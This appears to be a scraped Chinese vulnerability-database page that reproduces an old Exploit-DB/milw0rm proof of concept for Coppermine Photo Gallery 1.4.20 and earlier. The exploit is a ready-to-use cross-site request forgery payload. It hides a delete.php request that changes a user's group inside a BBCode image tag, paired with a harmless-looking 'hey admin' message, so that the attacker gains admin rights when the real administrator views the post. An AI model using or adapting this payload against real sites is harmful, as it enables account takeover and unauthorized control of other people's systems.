https://www.exploit-db.com/exploits/8114
Coppermine Photo Gallery 1.4.20 - BBCode IMG Privilege Escalation
| 漏洞ID | 1057498 | 漏洞类型 | |
| 发布时间 | 2009-02-26 | 更新时间 | 2009-02-26 |
 CVE编号
|
N/A |  CNNVD-ID
|
N/A |
| 漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
+--------------------------------------------------------------------------+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+--------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it |
| http://coppermine-gallery.net |
| Don't add me on msn messenger. |
| This vulnerability can be named as "bbcode img tag script injection" |
+--------------------------------------------------------------------------+
| Proof of Concept (an example,to understand it) |
+--------------------------------------------------------------------------+
URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
[img]URL[/img]
+--------------------------------------------------------------------------+
| Modify [ID] with your user id. |
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id] |
+--------------------------------------------------------------------------+
Insert the below code into a new message
hey admin,nice web site :)
[img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]
+-------------------------------------------------------------------------+
| The fake image doesn't show errors,you'll see "hey admin,nice web site" |
| You'll become admin when the real admin will visit the page |
+-------------------------------------------------------------------------+
# milw0rm.com [2009-02-26]检索漏洞
开始时间
结束时间